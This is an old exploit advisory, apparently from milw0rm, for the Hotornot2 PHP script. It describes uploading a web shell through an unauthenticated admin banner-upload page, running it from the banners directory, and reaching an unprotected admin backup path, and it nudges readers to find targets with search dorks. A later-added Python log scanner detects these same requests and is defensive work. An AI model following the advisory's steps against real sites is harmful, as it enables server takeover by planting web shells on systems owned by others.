[+] Hotornot2 Script (Remote Upload) Admin Bypass Vulnerability

===== ++ by sniper code++============================================

Author : sniper code ( S.C.T-443 )
website : www.sec-code.com
===================================================================================================================
[+] ScRipT : http://www.ezonescripts.com/scripts/sls/hotornot2.php
====================================================================================================================
[+] Exploit:

Go to :
http://localhost/[path]/admin/sitebanners/upload_banners.php ( no registration needed )

You will see (Upload banners).

( Browse and select a file, for example Shell.php, and press upload. )
You can press the View banners button to make sure your file was uploaded ...

Then go to :
http://localhost/[path]/banners/Shell.php ( will view the shell )

[+] To bypass admin for the backup :
Go to :
http://localhost/[path]/admin/backup

dork : use ur mind ^_^

That's it . . .

===================================================================================================================
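
Added example (not part of the original advisory, and not the author's or vendor's code): a check a defender can run over web-server access logs to spot successful requests to the three paths named above. The sample log lines, the /hot install prefix, the rule names and the script-extension list are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (Combined Log Format); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [26/May/2009:10:01:02 +0000] "GET /hot/admin/sitebanners/upload_banners.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [26/May/2009:10:01:30 +0000] "POST /hot/admin/sitebanners/upload_banners.php HTTP/1.1" 200 640 "-" "Mozilla/5.0"
203.0.113.7 - - [26/May/2009:10:01:41 +0000] "GET /hot/banners/Shell.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
198.51.100.4 - - [26/May/2009:10:05:00 +0000] "GET /hot/banners/spring_sale.gif HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
198.51.100.9 - - [26/May/2009:10:07:12 +0000] "GET /hot/admin/backup/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [26/May/2009:10:07:15 +0000] "GET /hot/admin/backup HTTP/1.1" 403 199 "-" "Mozilla/5.0"
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
RULES = [  # (rule name, HTTP method or None for any, path pattern)
    ("banner-upload-post", "POST", re.compile(r"/admin/sitebanners/upload_banners\.php$", re.I)),
    ("script-in-banners", None, re.compile(r"/banners/[^/]+\.(php\d?|phtml|phar)$", re.I)),
    ("admin-backup-served", None, re.compile(r"/admin/backup(/|$)", re.I)),
]

def scan(log_text):
    """Return (findings, escalated_ips) for successful (2xx) requests matching RULES."""
    findings, per_ip = [], defaultdict(set)
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        ip, method, target, status = m.groups()
        path = target.split("?", 1)[0]          # ignore the query string
        if not status.startswith("2"):
            continue                            # denied or missing: nothing was served
        for name, want_method, pattern in RULES:
            if (want_method is None or method == want_method) and pattern.search(path):
                findings.append((ip, name, path))
                per_ip[ip].add(name)
    # An upload POST plus a served script under /banners/ from the same client
    # matches the sequence in the advisory; escalate those clients.
    escalated = sorted(ip for ip, names in per_ip.items()
                       if {"banner-upload-post", "script-in-banners"} <= names)
    return findings, escalated

if __name__ == "__main__":
    hits, incidents = scan(SAMPLE_LOG)
    for hit in hits:
        print(*hit)
    print("escalate:", incidents)
```

Any "script-in-banners" hit means the server is serving script files from the banner directory, and any "admin-backup-served" hit means /admin/backup returned content; both point to missing access control on the admin paths.
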

[+] Greetz to :

[»] MN9 - AL-H7ano0ty - AB0 3thaB -snake1095 - rxh
[»] JiKo, Crackerz child...
[=] all members of tryag.cc + sec-code.com

===================================================================================================================

# milw0rm.com [2009-05-26]